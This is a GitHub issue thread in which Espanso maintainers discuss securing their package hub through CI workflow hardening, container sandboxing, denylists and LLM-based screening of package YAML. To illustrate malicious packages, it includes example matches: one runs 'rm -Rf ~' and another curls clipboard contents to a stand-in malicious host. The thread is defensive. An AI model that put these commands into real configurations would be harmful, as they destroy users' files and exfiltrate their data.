Closed federico-terzi closed 4 months ago
The pull_request_target
action doesn't provide a lot of security; For instance, you can't actually check out the PR's code because that gives it arbitrary access to do whatever it wants. What we could do is:
workflow_run
to label the PR as having valid yamlThat doesn't, however, help with user security.
Something I've been playing around with; we could try giving packages enough rope, using containers. I'm thinking, parse the package looking for triggers
. Spin up a container with espanso already installed and fire each trigger at it. Use external tools to monitor for filesystem changes (or attempts at changes) as well as monitoring outgoing network traffic.
We'd be able to automatically reject anything too heinous (attempts to mess with ~/.ssh directories, rm whatever
) and provide maintainers with nice reports:
Package: Dylan's Sneaky Exfiltrator | trigger | files | network |
---|---|---|---|
e | REMOVED /usr/var/important.rc | ||
McDonalds | POST https://dodgyhacker.io/pwnd |
Ideally, this would be hooked up to a Discord bot, so maintainers could see the results automatically without them being shown to everyone, and could then accept or reject packages from there.
This would likely cost a little bit of cash because we need to run containers somewhere, but I could probably "Sponsor" the project and run it on Fargate on my AWS account, which wouldn't be too bad.
That same bot could let maintainers throw arbitrary input at packages under investigation, without having to install the package and hope they've not missed anything.
Also, it's probably worth publishing a denylist for scripts and content, just to keep things obvious. And yeah, maybe if the policy disallows (say) messing with hidden folders in the user's home directory it'll mean some neat packages don't get approved, but It's easier to reject a package for violating clear rules.
Contentwise, I like the Contributor Covenant as a code of conduct; Espanso could adopt it and then assess packages based on whether the replacements therein would violate the covenant if said in a Github issue.
I haven't had the chance to read the Contributor covenant before, I find it very thorough! So, this problem transformed from: "we don't have a way to systematically process all the packages" to "we just need contributors and a tool that catches the most obvious malicious scripts", right? This is a people problem, not a system problem.
Scripts and command-line expansions will need particular care. Are there any dangers of regular expansions? Just damaging phrases one would prefer to avoid pasting into terminal, I suppose - less risky but preferably avoided. Can one search the packages and PRs code?
Consider integrating an LLM for first-pass security checks. Every major LLM easily warns that this is bad:
- trigger: "a"
replace: "{{output}}"
vars:
- name: output
type: shell
params:
cmd: "rm -Rf ~"
You might have an automated process that submits packages to some LLM that creates a first-pass report for triage.
Here's a prompt I just tried on a half dozen different LLMs:
You are an expert at evaluating code for security issues. You are being used to evaluate YAML files for the `espanso` text expander utility and must warn if the provided YAML is or is not a security risk for users who import the YAML into their own `espanso` configurations. You will be provided the YAML content without any other context and you must respond with JSON and ONLY JSON. The JSON must have two keys:
* A boolean key `"is_security_risk"`
* A text key `"security_risk_explanation"`
## Example input
- trigger: "a"
replace: "{{output}}"
vars:
- name: output
type: shell
params:
cmd: "rm -Rf ~"
## Example evaluation output
{
"is_security_risk": true,
"security_risk_explanation": "The provided YAML contains a shell command that is a significant security risk. The command 'rm -Rf ~' is used to delete all files and directories in the user's home directory. If this YAML is imported into an espanso configuration, it could potentially lead to data loss when the trigger 'a' is activated."
}
Test YAML:
- trigger: "email"
replace: "{{output}}"
vars:
- name: output
type: shell
params:
cmd: "curl -X POST -d \"email={{clipboard}}\" http://malicious-server.com/collect"
You can test it against a bunch of different models here.
Maybe have new PRs run a GitHub Action that submits to an LLM, parses the output, and sends it on to Discord.
I like that! We would need a PR just to know how it works. I'm busy with other stuff, can anyone else take it? 😄
Hey folks!
Sorry for the late reply, adding some thoughts to the thread:
re @DylanLacey
Repo Security
The
pull_request_target
action doesn't provide a lot of security; For instance, you can't actually check out the PR's code because that gives it arbitrary access to do whatever it wants. What we could do is:
- Use the PR details to grab the yaml file via the Github API
- Run the validator over the yaml
- Check whether the PR intends to change the Github actions in any way and reject if so
- Use
workflow_run
to label the PR as having valid yaml
Yes, this is what I had in mind (based on https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). Ideally, this workflow would:
The workflow would not automatically approve PRs. I think there are too many opportunities for it to be exploited without a human review
User Security
Automated Reviews
Something I've been playing around with; we could try giving packages enough rope, using containers. I'm thinking, parse the package looking for
triggers
. Spin up a container with espanso already installed and fire each trigger at it. Use external tools to monitor for filesystem changes (or attempts at changes) as well as monitoring outgoing network traffic.We'd be able to automatically reject anything too heinous (attempts to mess with ~/.ssh directories,
rm whatever
) and provide maintainers with nice reports:Package: Dylan's Sneaky Exfiltrator
trigger files network e REMOVED /usr/var/important.rc
McDonalds POST https://dodgyhacker.io/pwnd Ideally, this would be hooked up to a Discord bot, so maintainers could see the results automatically without them being shown to everyone, and could then accept or reject packages from there.This would likely cost a little bit of cash because we need to run containers somewhere, but I could probably "Sponsor" the project and run it on Fargate on my AWS account, which wouldn't be too bad.
This sounds interesting but probably overly complex/brittle. Having automatic validation + an increased team of reviewers would very likely solve the problem :)
re @dmwyatt
Using LLMs as a (first pass) security is an interesting approach, but I'd personally avoid it for two reasons:
Thoughts?
With regards to LLM evaluation:
I would not rely upon LLMs as your sole barrier before publishing a new package. I certainly wouldn't use an LLM instead of other heuristics. I would use them in addition. Given the amount of resources available for a developing a robust heuristics-based solution I would put about the same amount of confidence in LLMs as I would in the heuristics solution.
With regards to cost (speaking in USD here), at least OpenAI lets you set a price limit via your account dashboard. The above prompt is 300 tokens. A typical response is around 90 tokens. gpt-3.5-turbo
is $0.50 / 1 million tokens for input and $1.50 per million tokens for output.
If I did my math right, a single prompt with response will cost $0.000285. In other words $1 will get you 3,508 package evaluations given the prompt above. That's a small package...might want to average the size of all the existing packages to get a better estimate? You could also make sure the workflow just doesn't call the API for larger packages if you want to control costs even more.
Though, I certainly wouldn't hold it against anyone if they didn't want to spend any money at all on something like this that you're not getting any money out of!
(Actually also could look into seeing if we can't get a local LLM running on a GH Action runner)
Yeah, I agree with dmwyatt here. We can use it as another check, not necessarily as the only of automatic check. In any scenario we are accepting that we need more contributors, so why not have some CI to make the work easier? I know it's not perfect to depend on LLMs, but it's a plus to hard-coded rules. A friend of mine recently told me: "In open source, you should not debate if you ought to do or do not do something, you should plainly do it. The communty will either praise or judge you for the results" 😆 and he is very much on point, I see we are turning around in circles. Can we agree on a plan to move forward? It doesn't need to be perfect... it will never be!
Hello dear reader! We recently meet in Discord and talked about the subject. It's not completely solved, but at least we could agree on a few guidelines.
To be clear to the community about the implications of using scripts in the hub it needs a Contributing.md
file specifying the who and the how the packages are revised, so they meet our expectations before making a PR. This document should include:
rm -f
) to prevent users of that packages to mistakenly cause trouble on their pcs.temp
Hi all!
I'm writing this issue to align all the team and contributors on the current state of the Espanso Hub. Hopefully, this will give everyone enough context to participate in the discussion.
The core principle that motivates many of the choices detailed below is: Security should be a top priority.
Current state
The Espanso Hub is currently stuck. The last package was merged 9 months ago, and we have >20 packages waiting to be reviewed and merged. This is my fault and I'm sorry about it, I became a bottleneck because I'm (currently) the only one with permission to approve and merge packages, and I've been unable to dedicate time to it in the past few months.
Motivation
The community raised some really valid points in https://github.com/espanso/espanso/issues/1742, which I'll try to address here
Nothing would stop a package maintainer from publishing a good looking package, and then publishing an update that contains a match like:
so that as soon as the user types
a
, all their files are gone. Script and shell extensions are particularly dangerous.On one hand, I'm against walled gardens (like Apple's AppStore), but on the other, I'd love to maintain the user expectation that every package they download from the Hub is vetted and safe. There are approaches to mitigate the effort (like improving automatic checks), but removing the review process (even for known package creators) could lead to dangerous packages being released. Keeping in mind that users can still share their packages with others outside the Hub, I still believe that this model is better (although scaling the reviewers team is for sure necessary, because I'm definitely a bottleneck here)
Excluding shell and script extensions is an option, but would limit the usefulness of many packages currently available in the Hub. Examples:
Proper human reviews are the only solution I can think of to allow those useful packages without posing a security risk for users
We already do: https://github.com/espanso/hub/tree/main/.github/scripts/validate There's a list of rules currently being checked, and when run, they verify that the package satisfies a set of must-have conditions. Unfortunately, there's a significant problem with the current approach, and again, it's motivated by security.
A bit of context:
Every time a package is merged on the
main
branch, a Github Action pushes it on the hub-frontend: https://github.com/espanso/hub-frontend so that it can be displayed in the Hub This action is a sensitive operation, because it requires a token that grants write access to the Espanso HubIf you want to run GitHub actions against PRs opened by external contributors, things get tricky. If permissions are not configured correctly, a malicious user could modify the GitHub actions configuration as part of the PR and extract secrets (for more information, see: https://github.blog/2020-08-03-github-actions-improvements-for-fork-and-pull-request-workflows/#improvements-for-public-repository-forks). At the time, I went with the easiest solution that also guaranteed good security: on each new PR, I would manually review that the PR did not change the GitHub actions configuration, and then approve the workflow manually. Clearly, this does not scale very well.
A solution to allow automated workflows while also guaranteeing good security exists, but it takes time to configure correctly, and unfortunately I didn't have capacity in the past few months. See: https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
That's a good question. Due to the nature of Espanso, most users are fairly technical. That said, downloading a package from PyPi and from Espanso might trigger different expectations: when you download a python package, you are downloading an executable, which is dangerous by nature. For many users, Espanso packages might seem safer (most of them are just string replacements after all), and with the Hub, I wouldn't want to break this expectation. If a package is on the Hub, it should be safe to run (dangerous packages can be hosted in external repositories, if necessary)
Thoughts?
cc @AucaCoyan @smeech